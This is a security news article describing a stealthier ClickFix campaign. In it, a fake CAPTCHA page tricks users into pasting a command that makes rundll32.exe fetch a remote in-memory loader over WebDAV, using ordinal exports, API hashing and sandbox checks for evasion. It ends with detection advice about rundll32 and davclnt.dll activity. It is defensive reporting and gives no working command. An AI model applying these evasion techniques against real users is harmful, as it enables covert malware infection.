Cybersecurity researchers at CyberProof have uncovered a new and more covert version of the ClickFix attack campaign. Unlike earlier variants, which relied heavily on monitored scripting tools such as PowerShell or mshta, this updated technique shifts toward abusing native Windows components. As a result, attackers can bypass traditional security defenses more effectively while reducing the chances of detection.
To begin with, this attack relies heavily on social engineering. Victims unknowingly trigger the infection when they land on a compromised or malicious website. In this campaign, analysts observed a fake CAPTCHA page hosted on “healthybyhillary[.]com.” This deceptive interface tricks users into believing they must verify their identity. Consequently, it instructs them to open the Windows Run dialog using the “Win + R” shortcut, paste a pre-copied command with “Ctrl + V,” and press Enter.
Once the victim executes the command, the attack chain begins immediately. Specifically, rundll32.exe connects to an external server over port 80. It leverages WebDAV functionality, allowing the system to treat a remote web resource as if it were a local file share. This clever misuse of WebDAV helps attackers bypass defenses that typically monitor script-based activities.
Moreover, the attackers implement additional evasion techniques to stay under the radar. For instance, instead of calling functions by recognizable names, the malicious command references an export function using an ordinal value “#1.” This approach makes static detection significantly more difficult for security tools.
Following the initial execution, rundll32.exe downloads a remote DLL file named “verification.google.” This file acts as a secondary loader known as SkimokKeep, which operates entirely in memory. Because it avoids writing files to disk, it further reduces detection risks.
Subsequently, the attack transitions into PowerShell execution, but in a stealthy manner. It uses non-interactive flags to quietly download and execute additional payloads without raising alerts. In addition, SkimokKeep employs advanced obfuscation techniques. Instead of openly listing required Windows APIs, it dynamically resolves them using a method called DJB2 hashing. It also verifies whether it is running on a real system rather than a sandbox, thereby avoiding analysis by security researchers.
To mitigate this threat, organizations must adopt a broader detection strategy. Rather than focusing solely on script-based monitoring, defenders should closely observe unusual behavior involving native Windows tools. For example, security teams should flag instances where rundll32.exe loads davclnt.dll with DavSetCookie or initiates suspicious outbound connections using WebDAV syntax like “@80.”
Furthermore, restricting unnecessary WebDAV traffic and monitoring abnormal user-triggered executions can help stop such attacks early. Since the attack depends heavily on user interaction, raising awareness about fake CAPTCHA scams becomes essential.
Overall, this evolving ClickFix campaign highlights how attackers continue to refine their techniques, emphasizing the importance of adaptive cybersecurity strategies.
Recommended Cyber Technology News:
- CleanStart Replaces BusyBox for Secure Container Builds
- Securitas Partners Ambient.ai to Advance AI Security
- ProSight Launches Integrated Risk and Compliance Platform for Financial Institutions
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
